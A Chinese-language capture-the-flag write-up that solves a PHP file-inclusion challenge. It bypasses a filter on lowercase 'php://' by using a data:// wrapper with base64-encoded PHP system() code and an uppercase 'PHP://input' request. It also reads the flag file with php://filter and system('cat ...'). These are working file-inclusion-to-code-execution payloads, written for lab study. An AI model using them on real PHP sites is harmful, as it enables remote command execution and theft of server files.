php文件包含题
启动场景
进行代码审计:
对get类型参数进行循环过滤字符串'php://',所以考虑其他伪协议,伪协议详见PHP伪协议详解_Snakin_ya的博客-CSDN博客
show_source() 函数
str_replace() 函数
strstr() 函数
方法一 使用data协议
data://伪协议是数据流封装器,传递相应格式的数据。 通常可以用来执行PHP代码
经过测试官方文档上存在一处问题,经过测试PHP版本5.2,5.3,5.5,7.0;data:// 协议是是受限于allow_url_fopen的,官方文档上给出的是NO,所以要使用data://协议需要满足双on条件
PHP.ini:
data://协议必须双在on才能正常使用;
allow_url_fopen :on
allow_url_include:on
用法:
data://text/plain,
data://text/plain;base64,
由于file://协议用于本地系统,所以考虑用data://协议
1.构造payload:
page=data://text/plain;base64,<?php system("ls")?> (base64加密后的值)注意这里ls用双引号
即:data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
2.读取flag所在文件
?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php
3.使用base64解码,得到flag
方法二 运用php://input
php://input是个可以访问请求的原始数据的只读流。POST请求的情况下,最好使用php://input来代替$HTTP_RAW_POST_DATA,因为它不依赖于特定的php.ini指令。而且,这样的情况下$HTTP_RAW_POST_DATA默认没有填充,比激活always_populate_raw_post_data潜在需要更少的内存。enctype="multipart/form-data"的时候php://input是无效的。
1、php://input可以读取http entity body中指定长度的值,由Content-Length指定长度,不管是POST方式或者GET方法提交过来的数据。但是,一般GET方法提交数据时,http request entity body部分都为空。
2、php://input与$HTTP_RAW_POST_DATA读取的数据是一样的,都只读取Content-Type不为multipart/form-data的数据
1.访问PHP://input
构造payload:?page=PHP://input
2.使用bp抓包,send to repeater
输入<?php system('ls');?> ,这是php代码,ls是linux命令
查询到文件名
3,flag应该就在fl4gisisish3r3.php文件里面
输入 <?php system('cat fl4gisisish3r3.php');?>,打开这个文件
得到flag